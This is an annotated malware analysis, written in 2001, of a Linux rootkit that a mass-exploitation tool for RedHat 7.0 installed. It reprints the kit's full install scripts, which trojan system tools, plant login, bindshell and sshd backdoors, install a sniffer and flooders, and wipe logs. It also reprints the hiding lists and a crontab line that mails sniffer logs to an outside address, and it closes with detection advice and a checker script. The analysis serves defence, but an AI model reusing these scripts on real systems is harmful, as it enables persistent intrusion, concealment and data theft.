Date of Analysis : 17 / 06 / 01
Author : Fredrik Östergren [ press@alldas.de ]
Description : Linux rootkit from the mass-lpd autohacker ( rh7.tar.gz )

-----[ Disclaimer

Information revealed in this and other analyses is in no way meant to contribute to illegal actions such as hacking or other forms of computer crime. It should serve as an informative source to prevent actions like those mentioned above.

-----[ Introduction

You might have seen my analysis of the mass-lpd autohacker, which was used to mass-hack RedHat 7.0 machines running the printer service 'lpd'. If so, you might have noticed that it downloaded a rootkit called rh7.tar.gz from a distro ftp and installed it. However, when I analyzed that autohacker I didn't have a copy of the rh7.tar.gz file, but now I do. I hope you will enjoy this review; it's pretty big, and I'm very tired while writing this, so excuse any grammar errors or similar typos. Keep the comments rolling in, I want feedback! Now enjoy...!

-----[ Main

fredrik@slaptop:~/rh7$ ls -al
total 580
drwxr--r--   4 fredrik users  4096 Mar 28 21:27 ./
drwx--x--x  23 fredrik users  4096 Jun 14 22:43 ../
-rw-r--r--   1 fredrik users   494 Feb 27 15:17 .1addr
-rw-r--r--   1 fredrik users   253 Feb 27 15:17 .1file
-rw-r--r--   1 fredrik users   158 Mar  2 18:54 .1logz
-rw-r--r--   1 fredrik users   203 Mar 11 20:15 .1proc
-rwxr-xr-x   1 fredrik users  1198 Mar 18 17:31 atd.init*
-rwsr-sr-x   1 fredrik users 10748 Mar  5 16:32 chsh*
-rw-r--r--   1 fredrik users   110 Feb 24 17:47 crontab-entry
-rwxr-xr-x   1 fredrik users 24500 Mar  5 16:29 du*
-rwxr-xr-x   1 fredrik users 61808 Mar  5 16:32 find*
-rw-r--r--   1 fredrik users   816 Mar 18 17:29 functions
-rwxr-xr-x   1 fredrik users 22960 Mar  5 16:32 ifconfig*
-rwxr-xr-x   1 fredrik users  6261 Mar 25 20:04 install*
-rwxr-xr-x   1 fredrik users 11260 Mar  5 16:32 killall*
-rwxr-xr-x   1 fredrik users  6680 Mar  5 16:33 linsniffer*
-rwxr-xr-x   1 fredrik users 44480 Mar  5 16:33 login*
-rwxr-xr-x   1 fredrik users 34032 Mar 11 18:48 lpd*
-rwxr-xr-x   1 fredrik users 39296 Mar  5 16:33 ls*
-rwxr-xr-x   1 fredrik users   804 Mar 27 13:55 mail*
-rwxr-xr-x   1 fredrik users  6248 Mar 15 20:28 md5bd*
drwxr-xr-x   2 fredrik users  4096 Mar 15 21:00 mech/
-rwxr-xr-x   1 fredrik users 31240 Mar  5 16:33 netstat*
-rwxr-xr-x   1 fredrik users 33452 Mar  5 16:33 ps*
-rwxr-xr-x   1 fredrik users 11768 Mar  5 16:33 pstree*
-rwxr-xr-x   1 fredrik users  4060 Sep 21  2000 sense*
-rwxr-xr-x   1 fredrik users  3688 Mar  5 16:33 shad*
-rwxr-xr-x   1 fredrik users 10068 Mar  5 16:34 slice*
drwxr-xr-x   2 fredrik users  4096 Mar  5 16:30 sshd/
-rwxr-xr-x   1 fredrik users 26076 Mar  5 16:34 syslogd*
-rwxr-xr-x   1 fredrik users  1199 Mar 16 18:22 syslogd.init*
-rwxr-xr-x   1 fredrik users 49520 Mar 10 16:34 top*
-rwxr-xr-x   1 fredrik users  4780 Mar  5 16:44 vadim*
-rwxr-xr-x   1 fredrik users 39296 Mar  5 16:29 vdir*
-rwxr-xr-x   1 fredrik users  6100 Mar  5 16:34 wp*
-rwxr-xr-x   1 fredrik users  1736 Mar 16 18:27 xinetd*

md5sum output -
[ File: install ]

The following is the complete installation script that sets up the rootkit on the infected computer.

#!/bin/sh
unset HISTFILE                                            [ unsetting HISTFILE so no commands will be logged to .bash_history ]
cl="m"                                                    [ colors ]
cyn="m"
wht="m"
hblk="30m"
hgrn="32m"
hcyn="36m"
hwht="37m"
hred="31m"
echo "*** Rootkit install log ***" >install.log           [ making an install.log ]
cp -f syslogd.init /etc/rc.d/init.d/syslog >>install.log 2>&1      [ putting a trojaned sh script into /etc/rc.d/init.d/syslog ]
/etc/rc.d/init.d/syslog stop >>install.log 2>&1           [ stopping syslog so it can be trojaned ]
chattr -i /usr/bin/chsh /etc/rc.d/init.d/atd /usr/local/sbin/sshd /usr/sbin/sshd /bin/ps /bin/.ps /bin/netstat /bin/login /bin/ls /usr/bin/du /usr/bin/find /usr/sbin/atd /usr/bin/pstree /usr/bin/killall /usr/bin/top /sbin/fuser /sbin/ifconfig /sbin/syslogd /etc/rc.d/init.d/xinetd >>install.log 2>&1
[ <- removing the 'i' (immutable) flag so the rootkit can modify these files, and killing the running programs so the binaries can be replaced ]
echo
echo " ${cl}${cyn}-=${cl}${hblk}[${cl}${hgrn}overkill Red Hat 7.0 rootkit${cl}${hblk}]${cl}${cyn}=-${cl}${wht}"
echo
echo "${cl}${cyn}|${cl}${hcyn}= ${cl}${hwht}Installing trojaned programs...${cl}${wht}"
echo "${cl}${cyn}|${cl}${hcyn}--- ${cl}${wht}chsh"
chmod +s chsh
cp -f chsh /usr/bin/chsh >>install.log 2>&1               [ trojaning chsh ]
cp -f .1proc /dev/ttyop                                   [ copying the control files for the various trojans to their locations ]
cp -f .1addr /dev/ttyoa
cp -f .1file /dev/ttyof
cp -f .1logz /dev/ttyos
/etc/rc.d/init.d/atd stop >>install.log 2>&1              [ stopping the 'atd' service ]
killall -9 atd >>install.log 2>&1                         [ killing it if the stop script failed ]
rm -f /var/lock/subsys/atd                                [ removing its lock file ]
echo "${cl}${cyn}|${cl}${hcyn}--- ${cl}${wht}ps"
echo "ps " >>install.log
if [ ! -x /bin/lps ]; then
  mv -f /bin/ps /bin/lps >>install.log 2>&1               [ moving the original ps binary to /bin/lps ]
  if [ -x /bin/.ps ]; then
    mv -f /bin/.ps /bin/lps >>install.log 2>&1
  fi
fi
cp -f ps /bin/ps >>install.log 2>&1
if [ -x /bin/.ps ]; then
  cp -f ps /bin/.ps >>install.log 2>&1
fi
[ the same is done for the binaries top/pstree/killall/find/ls/vdir/du/netstat/ifconfig/syslogd; I removed it to save space... ]
if [ ! -d /usr/include/rpcsvc ]; then
  mkdir -p /usr/include/rpcsvc >>install.log 2>&1         [ making the secret rootkit dir ]
fi
echo "${cl}${cyn}|${cl}${hcyn}--- ${cl}${wht}ifconfig"
echo "ifconfig " >>install.log
if [ ! -x /usr/include/rpcsvc/ifc ]; then
  mv -f /sbin/ifconfig /usr/include/rpcsvc/ifc >>install.log 2>&1
fi
cp -f ifconfig /sbin/ifconfig
echo "${cl}${cyn}|${cl}${hcyn}--- ${cl}${wht}wp"
cp -f wp /usr/bin/wp                                      [ copying the log cleaner 'wipe' to /usr/bin/wp ]
echo "${cl}${cyn}|${cl}${hcyn}--- ${cl}${wht}shad"
echo "shad " >>install.log
cp -f shad /bin                                           [ copying the file 'shad' to /bin & /usr/bin ]
cp -f shad /usr/bin
echo "${cl}${cyn}|${cl}${hcyn}= ${cl}${hwht}Installing backdoors...${cl}${wht}"
echo "${cl}${cyn}|${cl}${hcyn}--- ${cl}${wht}login"
echo "login " >> install.log
mv -f /bin/login /usr/bin/xlogin >>install.log 2>&1       [ installing the /bin/login backdoor ]
cp -f login /bin/login >>install.log 2>&1
echo "${cl}${cyn}|${cl}${hcyn}--- ${cl}${wht}md5bd"
echo "md5bd " >> install.log >>install.log 2>&1
cp -f md5bd /usr/sbin/atd >>install.log 2>&1              [ installing the bindshell with md5 password as /usr/sbin/atd ]
cp -f lpd /sbin/lpd                                       [ also installing the bindshell as /sbin/lpd ]
cp -f atd.init /etc/rc.d/init.d/atd >>install.log 2>&1
if [ -x /sbin/chkconfig ]; then
  /sbin/chkconfig --add atd >>install.log 2>&1            [ adding the atd (bindshell) daemon to chkconfig ]
else
  ln -s /etc/rc.d/init.d/atd /etc/rc.d/rc0.d/K60atd       [ making links in the other rc.d directories to be sure it starts at bootup ]
  ln -s /etc/rc.d/init.d/atd /etc/rc.d/rc1.d/K60atd
  ln -s /etc/rc.d/init.d/atd /etc/rc.d/rc2.d/K60atd
  ln -s /etc/rc.d/init.d/atd /etc/rc.d/rc3.d/S40atd
  ln -s /etc/rc.d/init.d/atd /etc/rc.d/rc4.d/S40atd
  ln -s /etc/rc.d/init.d/atd /etc/rc.d/rc5.d/S40atd
  ln -s /etc/rc.d/init.d/atd /etc/rc.d/rc6.d/K60atd
fi
/etc/rc.d/init.d/atd start >>install.log 2>&1             [ starting the bindshell ]
echo "${cl}${cyn}|${cl}${hcyn}= ${cl}${hwht}Installing DoS programs...${cl}${wht}"
echo "${cl}${cyn}|${cl}${hcyn}--- ${cl}${wht}vadim"
cp -f vadim /usr/bin                                      [ installing the UDP flooder vadim ]
echo "${cl}${cyn}|${cl}${hcyn}--- ${cl}${wht}slice"
cp -f slice /usr/bin                                      [ installing the SYN flooder slice ]
echo "${cl}${cyn}|${cl}${hcyn}= ${cl}${hwht}Installing sniffer...${cl}${wht}"
echo "sniffer " >> install.log
if [ ! -d /usr/local/games ]; then
  mkdir -p /usr/local/games                               [ making the sniffer directory ]
fi
cp -f linsniffer /usr/local/games/identd                  [ installing the sniffer as 'identd' ]
cp -f sense /usr/local/games/banner                       [ installing the log parser for linsniffer as 'banner' ]
#echo "${cl}${cyn}|${cl}${hcyn}= ${cl}${hwht}Installing mech...${cl}${wht}"
#cd mech
#./mech-install >>../install.log 2>&1
#cd ..
cat functions >>/etc/rc.d/init.d/functions                [ installing the 'functions' file (reviewed later) ]
cp -f xinetd /etc/rc.d/init.d/xinetd                      [ installing the trojaned xinetd script ]
/etc/rc.d/init.d/xinetd restart
echo "${cl}${cyn}|${cl}${hcyn}= ${cl}${hwht}Setting up crontab entries...${cl}${wht}"
crontab -u operator crontab-entry >> install.log 2>&1     [ adding the file crontab-entry to the crontab of the user 'operator' ]
echo "${cl}${cyn}|${cl}${hcyn}= ${cl}${hwht}Installing sshd backdoor...${cl}${wht}"
cd sshd
./sshd-install >>../install.log 2>>../install.log         [ installing the sshd backdoor ]
cd ..
/etc/rc.d/init.d/lpd stop >>install.log 2>&1              [ stopping lpd and removing it from the chkconfig scripts ]
/sbin/chkconfig --del lpd >>install.log 2>&1
/etc/rc.d/init.d/syslog start >>install.log 2>&1          [ restarting with the trojaned syslogd ]
echo "${cl}${cyn}|${cl}${hcyn}= ${cl}${hwht}Cleaning logs...${cl}${wht}"
echo >/var/log/messages                                   [ zeroing out all logs ]
echo >/var/log/boot.log
echo >/var/log/cron
echo >/var/log/secure
echo >/var/log/maillog
echo
echo "${cl}${cyn}|${cl}${hcyn}= ${cl}${hwht}Rootkit installed. Enjoy! :)${cl}${wht}"     [ rootkit is done ]
[ eof 'install' ]

[ File: sshd-install ]

#!/bin/sh
mkdir -p /etc/ssh2 >>../install.log 2>&1                  [ making the directory /etc/ssh2 ]
cp -f init.sshd /etc/rc.d/init.d/sshd >>../install.log 2>&1
if [ -x /sbin/chkconfig ]; then
  /sbin/chkconfig --add sshd >>../install.log 2>&1        [ adding sshd to chkconfig ]
else
  ln -s /etc/rc.d/init.d/sshd /etc/rc.d/rc0.d/K25sshd     [ making sure sshd starts at bootup ]
  ln -s /etc/rc.d/init.d/sshd /etc/rc.d/rc1.d/K25sshd
  ln -s /etc/rc.d/init.d/sshd /etc/rc.d/rc2.d/S55sshd
  ln -s /etc/rc.d/init.d/sshd /etc/rc.d/rc3.d/S55sshd
  ln -s /etc/rc.d/init.d/sshd /etc/rc.d/rc4.d/S55sshd
  ln -s /etc/rc.d/init.d/sshd /etc/rc.d/rc5.d/S55sshd
  ln -s /etc/rc.d/init.d/sshd /etc/rc.d/rc6.d/K25sshd
fi
cp -f hostkey /etc/ssh2                                   [ installing the files the sshd backdoor needs: ]
cp -f hostkey.pub /etc/ssh2                               [ the hostkey / hostkey.pub files ]
cp -f sshd2_config /etc/ssh2                              [ and a normal config file (listening on port 22 etc.) ]
cp -f sshd /usr/local/sbin                                [ installing the binary into /usr/local/sbin & /usr/sbin ]
cp -f sshd /usr/sbin
/etc/rc.d/init.d/sshd start >>../install.log 2>&1         [ starting sshd ]
[ eof 'sshd-install' ]

[ File: functions ]

inet_start(){
  cd /usr/local/games                                     [ changing directory to the sniffer directory ]
  PBACK=$PATH
  PATH=/usr/local/games
  identd -e -o &                                          [ starting the sniffer ]
  PATH=$PBACK
  if [ -x /bin/shad ] || [ -x /usr/bin/shad ]; then
    shad [nfsd] /usr/local/sbin/sshd -q -p 137 >/dev/null 2>&1     [ if 'shad' exists it starts the sshd backdoor on port 137 (the netbios port) through it ]
  else
    /usr/local/sbin/sshd -q -p 137 >/dev/null 2>&1
  fi
  cd /usr/sbin
  PBACK=$PATH
  PATH=/usr/sbin
  sshd >/dev/null 2>&1                                    [ starting sshd on the normal port (running from the standard config file) ]
  PATH=$PBACK
  cd /
  cd /usr/local/sbin
  PBACK=$PATH
  PATH=/usr/local/sbin
  sshd -q -p 137 >/dev/null 2>&1                          [ skipping shad and instead starting the sshd backdoor like "normal" ]
  PATH=$PBACK
  cd /
  cd /usr/bin
  if [ -x /usr/bin/tcpd ]; then                           [ starting tcpd ?? ]
    PBACK=$PATH
    PATH=/usr/bin
    tcpd >/dev/null 2>&1
    PATH=$PBACK
    cd /
  fi
  if [ ! "`pidof "/sbin/lpd" 2>/dev/null`" ]; then
    cd /sbin
    PBACK=$PATH
    PATH=/sbin
    lpd >/dev/null 2>&1                                   [ starting the bindshell ]
    PATH=$PBACK
    cd /
  fi
}
[ eof 'functions' ]

[ File: mail ]

#!/bin/sh
MYIPADDR=`/sbin/ifconfig eth0 | grep "inet addr:" | \
awk -F ' ' ' {print $2} ' | cut -c6-`                     [ getting the Internet (IPv4) address ]
echo "Hostname : `hostname -f` ($MYIPADDR)"               [ getting the hostname ]
echo "Alternative IP : `hostname -i`"
if [ -f /etc/*-release ]; then                            [ getting the Linux release ]
  echo "Distro: `head -1 /etc/*-release`"
fi
uname -a
echo -----------------------------------------------------------------
echo "yahoo.com ping:"                                    [ Internet connection stats ]
ping -c 6 yahoo.com
echo -----------------------------------------------------------------
echo "hw info:"
echo "CPU: `cat /proc/cpuinfo|grep MHz|awk -F ' ' ' {print $4} '` MHz"     [ computer information ]
RAM=`free|grep Mem|awk -F ' ' ' {print $2} '`
if [ -x /usr/bin/dc ]; then
  echo "$RAM 1024 / 3 + p" >tmp
  echo "RAM: `/usr/bin/dc tmp` Mb"
  rm -f tmp
else
  echo "RAM: $RAM Kb"
fi
echo -----------------------------------------------------------------
[ This mail will be sent to the user when the kit is acting as an autohacker / worm ]
[ eof 'mail' ]

[ The following are the various control files used by some of the trojans ]

[ File: .1addr - /dev/ttyoa ]
[ Control file for the netstat trojan ]
[ 1 = Hide incoming connections from that address ]
[ 2 = Hide outgoing connections to that address ]
[ 3 = Hide incoming connections to that port ]
[ 4 = Hide outgoing connections to that port ]
[ 5 = Hide that UNIX socket (dir) ]

1 194.102                [ hide incoming connections from 194.102.*.* ]
1 24                     [ hide incoming connections from 24.*.*.* ]
3 37                     [ hide incoming connections to port 37 ]
3 134
3 112
3 114
3 135
3 136
3 137
3 23
3 21
3 22
3 2049
3 2424
3 465
4 6667
4 6669
4 6668
4 7000
4 6660
4 111
4 53
4 135
4 22
4 515
4 23
2 129.130.12.31
2 129.130.12.31
2 204.127.145.17
2 216.24.134.10
2 208.51.158.100
2 199.170.91.114
2 208.51.158.10
2 207.114.4.34
2 205.252.46.98
2 132.207.4.32
2 207.114.4.34
2 205.252.46.98
2 207.110.0.52
2 216.225.7.155
2 202.14.100.12
2 195.112.4.25
2 207.96.122.250
2 207.114.4.35
2 154.11.89.164
2 212.43.217.183
2 207.69.200.13
[ eof '.1addr' ]

[ File: .1file - /dev/ttyof ]
[ Control file for ls/vdir/dir/find/du ]
[ Hide all files whose names contain one of these strings ]

psybnc
yppoll
fortune
banner
tcp.log
lkillall
ltop
lpstree
r00ter
r00ter.tgz
r00ter2.c
r00ter2
psybnc.conf
scan
overstatdx
overlpr
overbind
scan
sshd
sshd2
ttyop
ttyof
ttyoa
ttyos
shad
tcpd
mech.set
mech.pid
mech.session
ftpusers-
[ eof '.1file' ]

[ File: .1logz - /dev/ttyos ]
[ Control file for the syslogd trojan ]
[ All log lines containing one of these strings will not be logged by syslogd ]
home.com
hobbiton.org
nether.net
oltenia.ro
194.102
24.3
sshd
syslog
klogd
net-pf-10
modprobe
ftpd
operator
games
promiscuous
PF_INET
xinetd
[nfsd]
[mingetty]
[ eof '.1logz' ]

[ File: .1proc - /dev/ttyop ]
[ Control file for ps/top ]
[ 3 = Hide all things containing 'string' ]

3 slice                  [ Ex. everything containing *slice* will be hidden from ps/top ]
3 vadim
3 overdrop
3 yppoll
3 eggdrop
3 mech
3 banner
3 r00ter
3 r00ter2
3 overlpd
3 overbind
3 overstatdx
3 scan
3 ping
3 sshd
3 bnc
3 linsniffer
3 ssh
3 nc
3 tcpd
3 rpc.lockd
3 rpc.mountd
3 lpd
[ eof '.1proc' ]

[ File: crontab-entry ]
[ This file will be added to the crontab of the user 'operator'; it looks like this ]

0 0 1 * * /usr/local/games/banner /usr/local/games/tcp.log|mail -s 'tcp.log' uglykid@mail.com >/dev/null 2>&1

[ Basically it will mail tcp.log to uglykid@mail.com on the 1st of every month ]
[ eof 'crontab-entry' ]

-----[ Am I infected ? How do I clean up ?

Q: Am I infected ?
A: If you think that you are infected, upload a clean ls and list the various directories that the install script creates, or just do:

fredrik@slaptop:~/analys/rh7$ strings /bin/ps | grep ttyo
/dev/ttyop

Also, if you notice that your connection is a bit slow, or that many packets are going out to the Internet from your host, you might be infected, as this kit includes DoS tools such as slice and vadim.

Q: How do I clean up ?
A: Back up any necessary files, but be sure that they are not infected before you put them on a fresh installation. A total reinstallation is often needed in these cases. Follow the normal steps after a break-in.
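As an added check (not part of the original analysis), the following script looks for the artefacts the install script leaves behind (the control files under /dev, the moved originals, the hidden directory, the inet_start function appended to /etc/rc.d/init.d/functions) and decodes the .1addr/.1proc control files so the responder sees what the kit was configured to hide. The paths come from the install script; the ROOT argument, the function names and the fake tree used in the test are my own assumptions.

```shell
#!/bin/sh
# Checker for the artefacts the install script above leaves behind.
# ROOT is the tree to inspect: pass / for a live system, or the mount
# point of a disk image; the test below uses a constructed fake tree.
# Assumption: the kit was installed with the paths used in the script.

# Translate one line of /dev/ttyoa (.1addr) into the rule netstat applies.
decode_addr_rule() {
  case "$1" in
    1) echo "hide incoming connections from $2" ;;
    2) echo "hide outgoing connections to $2" ;;
    3) echo "hide incoming connections to port $2" ;;
    4) echo "hide outgoing connections to port $2" ;;
    5) echo "hide UNIX socket $2" ;;
    *) echo "unknown rule '$1 $2'" ;;
  esac
}

# Print every indicator found under ROOT and return non-zero if any was.
rk_check() {
  root="${1%/}"; hits=0
  # control files for the trojaned tools, moved originals, backdoor parts
  for f in /dev/ttyop /dev/ttyoa /dev/ttyof /dev/ttyos /bin/lps \
           /usr/bin/xlogin /usr/include/rpcsvc/ifc /usr/local/games/identd \
           /usr/local/games/banner /bin/shad /usr/bin/shad /usr/bin/wp \
           /usr/bin/vadim /usr/bin/slice /etc/ssh2/sshd2_config /sbin/lpd; do
    [ -e "$root$f" ] && { echo "artefact: $f"; hits=$((hits+1)); }
  done
  [ -d "$root/usr/include/rpcsvc" ] && {
    echo "hidden dir: /usr/include/rpcsvc"; hits=$((hits+1)); }
  # replaced tools embed the path of their control file: the
  # 'strings /bin/ps | grep ttyo' check from the Q&A, for every replaced tool
  for b in /bin/ps /bin/netstat /bin/ls /usr/bin/du /usr/bin/find \
           /usr/bin/pstree /usr/bin/killall /usr/bin/top /sbin/ifconfig \
           /sbin/syslogd /usr/bin/vdir; do
    [ -f "$root$b" ] && grep -aq '/dev/ttyo' "$root$b" && {
      echo "control-file reference in $b"; hits=$((hits+1)); }
  done
  [ -f "$root/etc/rc.d/init.d/functions" ] &&
    grep -q 'inet_start' "$root/etc/rc.d/init.d/functions" && {
      echo "inet_start() appended to /etc/rc.d/init.d/functions"; hits=$((hits+1)); }
  # decode the control files so the responder knows what was being hidden
  [ -f "$root/dev/ttyoa" ] && while read -r code arg; do
    [ -n "$code" ] && echo "  netstat: $(decode_addr_rule "$code" "$arg")"
  done < "$root/dev/ttyoa"
  [ -f "$root/dev/ttyop" ] && while read -r code str; do
    [ "$code" = 3 ] && echo "  ps/top: hide processes matching *$str*"
  done < "$root/dev/ttyop"
  echo "$hits indicator(s) found"
  [ "$hits" -eq 0 ]
}

if [ $# -gt 0 ]; then rk_check "$1"; fi
```

Run it with a shell and grep copied from known-good media, since the kit replaces exactly the tools such a check relies on (it hides the ttyo* names from ls/find and the control-file strings would go unseen through a trojaned find).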
-----[ File summary

.1addr        = Control file for netstat
.1file        = Control file for ls/vdir/dir/find/du
.1logz        = Control file for syslogd
.1proc        = Control file for ps/top
atd.init      = Trojaned version of an init file to start the bindshell at bootup
chsh          = Trojaned version of chsh
crontab-entry = File to mail the sniffer log to uglykid@mail.com
du            = Trojaned version of du to hide files
find          = Trojaned version of find to hide files
functions     = Script to start various trojans such as the sshd backdoor and the bindshell
ifconfig      = Trojaned ifconfig to hide promiscuous mode when an ethernet sniffer is running
install       = Install script for the rootkit
killall       = Trojaned version of killall so root cannot kill the processes listed in /dev/ttyop
linsniffer    = Ethernet sniffer to sniff data on a LAN
login         = Trojaned version of /bin/login (allows remote root logins with a magic password)
ls            = Trojaned version of ls to hide the files listed in /dev/ttyof
mail          = Script to gather information about the computer, to be e-mailed to the "hacker"
md5bd         = Bindshell with md5 password (pwd=855f314a4a3eebb6e1f9c3dae3a8ae31). Will be copied to /usr/sbin/atd
mech/         = Directory containing the IRC bot 'mech'
netstat       = Trojaned version of netstat to hide the connections specified in /dev/ttyoa
ps/pstree/top = Trojaned versions which hide the processes specified in /dev/ttyop
sense         = Log parser for linsniffer
slice         = DoS tool (SYN flooder)
sshd/         = Directory containing the sshd backdoor and the files it needs
syslogd       = Trojaned version of syslogd to drop log lines containing a string from /dev/ttyos
syslogd.init  = Trojaned init script to start syslogd
vadim         = DoS tool (UDP flooder)
vdir          = Trojaned version of vdir to hide files
wp            = The log cleaner WIPE, to clean wtmp/utmp/lastlog
xinetd        = Trojaned init script to start xinetd

-----[ Conclusion

This rootkit replaces many binaries, which makes it easy to detect. It makes no effort to keep the date/time/size of the original binaries, so a clean version of ls will show the changes on the trojaned files. It puts backdoors and DoS tools right into the /bin & /usr/sbin directories and therefore relies heavily on the /bin/ls trojan. Lots of improvements could have been made to this kit, but I doubt the author put much energy into it.

Fredrik Östergren
press@alldas.de